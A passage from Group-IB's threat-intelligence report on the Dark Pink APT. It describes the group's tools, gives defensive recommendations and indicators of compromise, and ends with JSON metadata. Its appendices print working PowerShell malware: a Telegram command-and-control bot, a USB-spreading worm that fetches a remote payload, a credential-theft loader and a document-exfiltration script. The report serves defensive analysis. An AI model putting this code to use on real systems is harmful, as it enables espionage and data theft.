During\r\nexecution, the bot works with two registry keys: HKCU\\Environment\\Update and HKCU\\Environment\\guid. The\r\nfirst one stores the last message id processed from the Telegram bot (the parameter update_id from\r\nTelegram). The second key stores the unique identifier of the infected machine. It is generated by the command\r\n[guid]::NewGuid() when the bot launches for the first time. Upon registration, the threat actors get various pieces\r\nof information about the infected machine, such as IP, GUID, and computer name. The IP address is ascertained via\r\na GET request to https://ifconfig.me/ip. These processes are also based on PowerShell commands, and we will dig a\r\nlittle deeper into those later in the report. The bot implementation is shown in APPENDIX A.\r\nSome variants of this module contain additional functionality for ensuring lateral movement. All other\r\nfunctionalities are the same. In the cases that Group-IB analyzed, the Telegram parameter can either be hardcoded in\r\nthe scripts or read from the registry key.\r\nKamiKakaBot\r\nKamiKakaBot is the .NET version of TelePowerBot, and we found very few differences between the pair of them.\r\nBefore commands are read, KamiKakaBot is able to exfiltrate data from the Chrome, MS Edge, and Firefox browsers.\r\nIt is able to update itself, and once it receives commands, it can pass an argument to the cmd.exe process.\r\nFigure 13: Screenshot detailing decompiled executable that contains KamiKakaBot\r\nPowerSploit/Get-MicrophoneAudio\r\nAs we have noted above, the threat actors behind Dark Pink almost exclusively leveraged custom-made tools.\r\nHowever, to record the microphone audio from infected devices, they turned to a publicly available PowerSploit\r\nmodule – Get-MicrophoneAudio. This is loaded onto the victim’s machine via download from Github. 
Group-IB\r\nresearchers found that antivirus software on victim machines blocked this process when the threat actors\r\nattempted to launch the module. We found that the threat actors attempted to obfuscate the original PowerSploit\r\nmodule to make it undetectable, but these attempts were unsuccessful. As a result, the threat actors returned to the drawing\r\nboard and added a script (below) that was successfully able to record the microphone audio on infected devices.\r\nStart-Job {\r\n while(1){\r\nps psr -erroraction 'silentlycontinue' | kill -force;sleep 30;\r\nni \"$($env:tmp)\\\\record\" -ItemType Directory -erroraction 'silentlycontinue';\r\nstart psr -ArgumentList \"/start /output $($env:tmp)\\\\record\\\\$((get-date).tostring('yyyyMMddH\r\nsleep 60;\r\nstart psr -ArgumentList \"/stop\"\r\n }\r\n}\r\nThis simple script launches a background task that triggers the standard utility PSR to capture sound every minute.\r\nThe recorded audio files will be saved inside a ZIP archive that is located in a temporary folder\r\n(%TEMP%\\record). The files are named according to the following template: ‘yyyyMMddHHmmss’. These audio\r\nfiles are then exfiltrated with a separate script that sends them (as a ZIP archive) to the threat actors’ Telegram\r\nbot.\r\nZMsg (Messenger exfiltration)\r\nThe threat actors are also interested in stealing data from messengers on infected devices. To this end, they\r\nare able to execute commands to identify leading messengers, such as Viber, Telegram, and Zalo. In the case of\r\nViber, these commands allow the threat actors to exfiltrate the %APPDATA%\\Viberpc folder on infected devices,\r\nwhich allows them to gain access to the messages and contact lists of the victims. 
We are still doing work to assess\r\nwhat the threat actors are able to draw from Telegram accounts on infected devices, but the case of Zalo is one that\r\npiqued our interest.\r\nIf Zalo messenger is present on the victim’s device, the threat actors can launch a command to download a special\r\nutility (dubbed ZMsg by Group-IB) from Github. This utility, which is a .NET application based on the FlaUI\r\nlibrary, allows the threat actors to exfiltrate the victim’s messages on the Zalo platform. FlaUI is a library that\r\nassists with the automated UI testing of Windows applications, with the entry point usually an application or the\r\ndesktop to generate an automation element. Through this, it is possible to analyze sub-elements and interact with\r\nthem.\r\nZMsg iterates over the elements of Windows applications to discover those with particular names. For example, the\r\nelement with messages has the name “messageView”. All collected information is stored in the\r\n%TEMP%\\KoVosRLvmU\\ folder in files with the .dat and .bin extensions. File names are created as an encoded\r\nhex string and are generated in accordance with the template below:\r\n%PERSON_NAME%_%DAY%_%MONTH%_%YEAR%\r\nCommands\r\nThe threat actors issue commands to an infected device by specifying its IP, computer name, or botid. Tasks can\r\nalso be issued to all infected devices simultaneously. During our examination, we noticed several different kinds\r\nof commands. The functionalities of some of these commands overlap, but they are all based on PowerShell\r\ncommands. For example, TelePowerBot can execute a simple standard console tool, such as whoami, or a\r\ncomplex PowerShell script.\r\nDuring infection, the threat actors execute several standard commands (e.g. net share, Get-SmbShare) to\r\ndetermine what network resources are connected to the infected device. 
If network disk usage is found, they will\r\nbegin exploring this disk to find files that may be of interest to them and potentially exfiltrate them. In the prior\r\nsection, we noted how Dark Pink threat actors carry out lateral movement. In this campaign, the threat actors\r\ncan also infect files on USB disks attached to the infected devices. The script below details how the threat actors\r\ncompile a list of network shares and the removable devices connected to the machine.\r\n(gwmi cim_logicaldisk|?{($_.drivetype -eq 2)-and(Test-path $($_.deviceid)\\\\)}).deviceid;\r\n(get-smbshare|?{($_.name -notlike \"*$\")-and($_.name -ne Users)-and($_.path -like *:\\\\*)}).path;\r\n(Get-SMBMapping|?{$_.Status -eq \"OK\"}).remotepath|?{$_ -notlike '*\\\\IPC$'}\r\nThe threat actors can also issue a command to take a screenshot of the desktop of the compromised device\r\nand save these in the %TEMP% directory. They then download the images by issuing the below command.\r\nAdd-type -AssemblyName System.Drawing\r\nAdd-Type -AssemblyName System.Windows.Forms\r\n[System.Windows.Forms.Screen]::AllScreens|%{\r\n $bounds =$_.bounds;\r\n if($bounds.width -lt 1920){$bounds.width=1920}\r\n if($bounds.height -lt 1080){$bounds.height=1080}\r\n $image = New-Object Drawing.Bitmap $bounds.width, $bounds.height\r\n $graphics = [Drawing.Graphics]::FromImage($image)\r\n $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)\r\n $screen_file = \"$env:tmp\\\\$($_.DeviceName.replace('\\\\\\\\.\\\\',''))_$((get-date).tostring('yyyyMMddH\r\n $image.Save($screen_file)\r\n $graphics.Dispose()\r\n $image.Dispose()\r\n $screen_file\r\n}\r\nConclusion\r\nAPT groups come and go, but the preliminary findings of Group-IB’s research into Dark Pink APT\r\ndemonstrate how threat actors can change course, leverage new TTPs, and achieve devastating results. 
The\r\nthreat actors behind Dark Pink were able, with the assistance of their custom toolkit, to breach the defenses of\r\ngovernmental and military bodies in a range of countries in the APAC and European regions. Dark Pink’s\r\ncampaign once again underlines the massive dangers that spear-phishing campaigns pose for organizations, as\r\neven highly advanced threat actors use this vector to gain access to networks, and we recommend that\r\norganizations continue to educate their personnel on how to detect these sorts of emails.\r\nAt this stage, Group-IB researchers can confidently say that Dark Pink was behind the successful breaches of at\r\nleast seven organizations, although we believe that this number could be higher. In line with Group-IB’s zero-tolerance policy to cybercrime, our analysts will continue their diligent efforts to uncover Dark Pink’s origin and\r\nwork to uncover more of the unique or peculiar TTPs utilized by this group. We will continue to issue proactive\r\nnotifications to any organization we find to have been breached by this particular threat group.\r\nIn this blog, we attempted to reveal how Group-IB’s proprietary Threat Intelligence system, which detects\r\nattacks automatically, can identify the mechanics behind ongoing threat campaigns. Our clients are the first to\r\nbe informed about Dark Pink, along with other new APT groups that may appear on the horizon, and they\r\nare also the first to obtain the names of compromised organizations, which helps them avoid supply-chain attacks\r\nand make their network infrastructure more secure.\r\nRecommendations\r\nUse modern email protection measures to prevent initial compromise via spear-phishing emails. 
We\r\nrecommend Group-IB’s Business Email Protection, which is able to counter these threats effectively.\r\nOrganizations should ensure they foster a cybersecurity culture in their workplace, which includes\r\nsufficient training for staff on how to identify phishing emails.\r\nEnsure that your security measures allow for proactive threat hunting that can help identify threats that\r\ncannot be detected automatically.\r\nLimit access to file-sharing resources, with the exception of those used within the organization.\r\nMonitor the creation of LNK files in unusual locations, such as network drives and USB devices.\r\nEnsure that you observe any use of commands and built-in tools that are frequently used for collecting\r\ninformation about the system and files.\r\nMaintaining a secure organization requires ongoing vigilance, and using a proprietary solution such as\r\nGroup-IB Threat Intelligence can help organizations shore up their security posture by equipping security\r\nteams with the latest insights into new and emerging threats.\r\nIndicators of compromise\r\nFile indicators:\r\nCucky: MD5: 926027F0308481610C85F4E3E433573B SHA1: 24F65E0EE158FC63D98352F9828D014AB239AE16 SHA256: 9976625B5A3035DC68E878AD5AC3682CCB74EF2007C501C8023291548E11301A\r\nCtealer Loader: MD5: 728AFA40B20DF6D2540648EF845EB754 SHA1: D8DF672ECD9018F3F2D23E5C966535C30A54B71D SHA256: C60F778641942B7B0C00F3214211B137B683E8296ABB1905D2557BFB245BF775\r\nPacked Ctealer: MD5: 7EAF1B65004421AC07C6BB1A997487B2 SHA1: 18CA159183C98F52DF45D3E9DB0087E17596A866 SHA256: E3181EE97D3FFD31C22C2C303C6E75D0196912083D0C21536E5833EE7D108736\r\nMD5: 732091AD428419247BCE87603EA79F00 SHA1: 142F909C26BD57969EF93D7942587CDF15910E34 SHA256: E45DF7418CA47A9A4C4803697F4B28C618469C6E5A5678213AB81DF9FCC9FD51\r\nFile path:\r\n$env:tmp\\backuplog $env:tmp\\backuplog1 $env:appdata\\archive.zip $env:appdata\\telegram.txt\r\n$env:tmp\\afkslfsa.csv 
$env:tmp\\AB.zip $Env:tmp\\AB\r\nScheduled task name:\r\nMutex:\r\ngwgXSznM-Jz92k33A-uRcCCksA-9XAU93r5\r\nRegistry path:\r\nHKCU:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell HKCU\\Environment\\OSBuild\r\nHKCU\\Environment\\STMP HKCU\\Environment\\SYSPS HKCR:\\zolfile\\shell\\open\\command\r\nHKCR:\\zolofile\\shell\\open\\command\\zolo HKCU:\\Environment\\guid HKCU:\\Environment\\Update\r\nHKCU:\\Environment\\UserInitMprLogonScript HKCU:\\SOFTWARE\\\\Classes\\\\abcdfile\\shell\\abcd\\\r\nHKCU:\\SOFTWARE\\Classes\\.4ID\\ HKCU:\\SOFTWARE\\Classes\\.abcd HKCU:\\SOFTWARE\\Classes\\.psr\r\nHKCU:\\SOFTWARE\\Classes\\.zol HKCU:\\SOFTWARE\\Classes\\.zolo\r\nHKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\r\nHKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\\\r\nHKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\\DelegateExecute\r\nHKCU:\\SOFTWARE\\Classes\\4IDfile\\shell\\open\\command\\DelegateExecute\\\r\nHKCU:\\SOFTWARE\\Classes\\abcdfile\\shell HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\aaaa\r\nHKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\abcd HKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\open\\command\r\nHKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\open\\command\\abcd\r\nHKCU:\\SOFTWARE\\Classes\\abcdfile\\shell\\open\\command\\DelegateExecute\r\nHKCU:\\SOFTWARE\\Classes\\psrfile\\shell\\open\\command\r\nHKCU:\\SOFTWARE\\Classes\\psrfile\\shell\\open\\command -Name DelegateExecute\r\nHKCU:\\SOFTWARE\\Classes\\zolfile\\shell\\open\\command\\DelegateExecute\r\nHKCU:\\SOFTWARE\\Classes\\zolfile\\shell\\open\\command\\zolo\r\nHKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command\r\nHKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command -Name DelegateExecute\r\nHKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command -Name DelegateExecute\r\nHKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command -Name zolo\r\nHKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command -Name zolo 
-Value\r\nHKCU:\\SOFTWARE\\Classes\\zolofile\\shell\\open\\command\\zolo\r\nHKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Forfiles\r\nHKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Psr\r\nHKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Recents\r\nAPPENDIX A. TelePowerBot\r\n[System.Net.ServicePointManager]::SecurityProtocol=@(\"Tls12\",\"Tls11\",\"Tls\",\"Ssl3\")\r\n$token=\"CHANGED\"\r\n$id=CHANGED\r\n$mid=(gp \"HKCU:\\\\Environment\" -name Update).Update\r\n$guid = (gp \"HKCU:\\\\Environment\" -name guid).guid\r\n$ip=irm \"https://ifconfig.me/ip\"\r\nif( -not (New-Object System.Threading.Mutex($false, $guid)).WaitOne(1)){\r\n exit\r\n}\r\nif($mid -and $guid){\r\n irm -Uri \"https://api.telegram.org/bot$($token)/sendMessage?chat_id=$($id)\u0026text=$guid :: $env:COM\r\n}\r\nelse {\r\n $guid = [guid]::NewGuid().guid\r\n Set-ItemProperty \"HKCU:\\\\Environment\" -name \"GUID\" -value $guid\r\n irm -Uri \"https://api.telegram.org/bot$($token)/sendMessage?chat_id=$($id)\u0026text=$guid :: $env:COM\r\n}\r\nif($mid -isnot [int]){\r\n $mid = 0\r\n}\r\nwhile(1){\r\n Start-Sleep 60;\r\n (irm -Uri \"https://api.telegram.org/bot$($token)/getUpdates\").result|%{\r\n if ($mid -lt $_.update_id) {\r\n $mid=$_.update_id;\r\n $name,$task=$_.message.text -split \" :: \";\r\n if ( ($name -like $ip) -or ($name -like $env:COMPUTERNAME) -or ($name -like $guid) -or ($\r\n $message = $($task | iex)2\u003e\u00261 | Out-String;\r\n if (\"\" -eq $message){\r\n $message=\"Task Done!\"\r\n }\r\n $b=0;\r\n while ($b -lt $message.Length) {\r\n $c = 4000;\r\n if (($c + $b) -gt $message.Length){$c=$message.Length % 4000}\r\n irm -Uri \"https://api.telegram.org/bot$($token)/sendMessage?chat_id=$($id)\u0026text=$\r\n $b+=$c\r\n }\r\n }\r\n }\r\n Set-ItemProperty \"HKCU:\\\\Environment\" -name \"Update\" -value $mid\r\n}\r\n}\r\nAPPENDIX 
B. PowerShell script for lateral movement over removable devices\r\n[Net.ServicePointManager]::SecurityProtocol=@(\"Tls12\",\"Tls11\",\"Tls\",\"Ssl3\");\r\n$ErrorActionPreference=\"Continue\";\r\n$Query = \"select * from __InstanceCreationEvent within 5 where TargetInstance ISA 'Win32_LogicalDisk\r\n$Action = {\r\n (gwmi cim_logicaldisk|?{($_.drivetype -eq 2)-and(Test-path \"$($_.deviceid)\\\")}).DeviceID|%{\r\n $uri = \"https://raw.githubusercontent.com/efimovah/abcd/main/xxx.gif\";\r\n Start-BitsTransfer -Source $uri -Destination \"$Env:tmp\\xxx.zip\";\r\n Expand-Archive -Path \"$env:temp\\xxx.zip\" -DestinationPath \"$env:temp\" -force\r\n cp \"$env:temp\\xxx\" \"$_\\dism\" -Recurse -Force;\r\n sc \"$_\\system.bat\" -value \"@echo off`ncd %cd%dism`nstart dism.exe`nexit\";\r\n attrib +s +h \"$_\\dism\";attrib +s +h \"$_\\dism\\*.*\";attrib +s +h \"$_\\system.bat\";\r\n (Gci \"$_\\\" -Directory -force)|?{$_.name -notin ('dism','$RECYCLE.BIN','System Volume Informat\r\n attrib +s +h \"$($_.fullname)\"\r\n $WshShell = New-Object -comObject WScript.Shell\r\n $Shortcut = $WshShell.CreateShortcut(\"$($_.fullname).lnk\")\r\n $Shortcut.TargetPath = \"%SystemRoot%\\System32\\cmd.exe\"\r\n $Shortcut.Arguments = \"/c start explorer $($_.name) \u0026\u0026 system.bat \u0026\u0026 exit\"\r\n $Shortcut.IconLocation = \"%SystemRoot%\\System32\\SHELL32.dll,4\"\r\n $Shortcut.WorkingDirectory = \"%cd%\"\r\n $Shortcut.Save()\r\n }\r\n }\r\n};\r\nRegister-WmiEvent -Query $Query -Action $Action -SourceIdentifier USBFlashDrive\r\nAPPENDIX C. 
PowerShell script for credential theft\r\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;\r\n[Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).Down\r\nStart-Sleep 60;\r\ncp -path \"$env:tmp\\\\backuplog\" -Destination \"$env:tmp\\\\backuplog1\" -recurse -force; $file = \"$env:tmp\r\n$ascii = [System.Text.Encoding]::ascii;\r\nCompress-Archive -Path $File -Destination \"$file.zip\" -Force;\r\n$file = \"$file.zip\"\r\n$reg = \"HKCU:\\\\Environment\"\r\n$token,$chat_id = (gp $reg -name GUID).GUID -split \"::\"\r\nAdd-Type -AssemblyName System.Net.Http\r\n$form = new-object System.Net.Http.MultipartFormDataContent\r\n$form.Add($(New-Object System.Net.Http.StringContent $Chat_ID), 'chat_id')\r\n$Content = [System.IO.File]::ReadAllBytes($file)\r\n$byte = New-Object System.Net.Http.ByteArrayContent ($Content, 0, $Content.Length)\r\n$byte.Headers.Add('Content-Type','text/plain')\r\n$name = $ascii.getstring($ascii.getbytes(\"$($env:COMPUTERNAME)_$($file)\")) -replace ':|\\\\\\\\|\\\\?','_'\r\n$form.Add($byte, 'document', $name)\r\n$ms = new-object System.IO.MemoryStream\r\n$form.CopyToAsync($ms).Wait()\r\nirm -Method Post -Body $ms.ToArray() -Uri \"\" -ContentType $form.Headers.ContentType.ToString()\r\nrm $file -Force -Recurse\",\r\nAPPENDIX D. 
PowerShell script to exfiltrate documents from shared network resources\r\n$extentions = @('.doc','.docx','.xls','.xlsx','.ppt','.pptx','.pdf');\r\n$file = \"$env:tmp\\\\documents_$((get-date).tostring('yyyyMMddHHmmss')).csv\"\r\ngdr -PsProvider FileSystem | Select Root | %{gci -Path $_.Root -Recurse -ErrorAction SilentlyContinue\r\n$ascii = [System.Text.Encoding]::ascii;\r\nCompress-Archive -Path $File -Destination \"$file.zip\" -Force;\r\n$file = \"$file.zip\"\r\n$chat_id=CHANGED\r\n$token=\"CHANGED\"\r\nAdd-Type -AssemblyName System.Net.Http\r\n$form = new-object System.Net.Http.MultipartFormDataContent\r\n$form.Add($(New-Object System.Net.Http.StringContent $Chat_ID), 'chat_id')\r\n$Content = [System.IO.File]::ReadAllBytes($file)\r\n$byte = New-Object System.Net.Http.ByteArrayContent ($Content, 0, $Content.Length)\r\n$byte.Headers.Add('Content-Type','text/plain')\r\n$name = $ascii.getstring($ascii.getbytes(\"$($env:COMPUTERNAME)_$($file)\")) -replace ':|\\\\\\\\|\\\\?','_'\r\n$form.Add($byte, 'document', $name)\r\n$ms = new-object System.IO.MemoryStream\r\n$form.CopyToAsync($ms).Wait()\r\nirm -Method Post -Body $ms.ToArray() -Uri \"https://api.telegram.org/bot$token/sendDocument\" -ContentT\r\nrm $file -Force -Recurse\r\nSource: https://www.group-ib.com/blog/dark-pink-apt/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.group-ib.com/blog/dark-pink-apt/"
	],
	"report_names": [
		"dark-pink-apt"
	],
	"threat_actors": [
		{
			"id": "fd4c3ddd-11cc-4192-9c94-ff107d7f8492",
			"created_at": "2023-02-18T02:04:24.06294Z",
			"updated_at": "2026-04-10T02:00:04.644528Z",
			"deleted_at": null,
			"main_name": "Dark Pink",
			"aliases": [
				"Saaiwc Group"
			],
			"source_name": "ETDA:Dark Pink",
			"tools": [
				"Ctealer",
				"Cucky",
				"KamiKakaBot",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"PowerSploit",
				"TelePowerBot",
				"ZMsg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "fbe45970-1e9e-4a82-bc06-46317a248479",
			"created_at": "2026-02-03T02:00:03.45132Z",
			"updated_at": "2026-04-10T02:00:03.947304Z",
			"deleted_at": null,
			"main_name": "DarkPink",
			"aliases": [
				"Saaiwc"
			],
			"source_name": "MISPGALAXY:DarkPink",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434083,
	"ts_updated_at": 1775826742,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ecc44c1803892dc2a4d04590c41c1245fff5e536.pdf",
		"text": "https://archive.orkl.eu/ecc44c1803892dc2a4d04590c41c1245fff5e536.txt",
		"img": "https://archive.orkl.eu/ecc44c1803892dc2a4d04590c41c1245fff5e536.jpg"
	}
}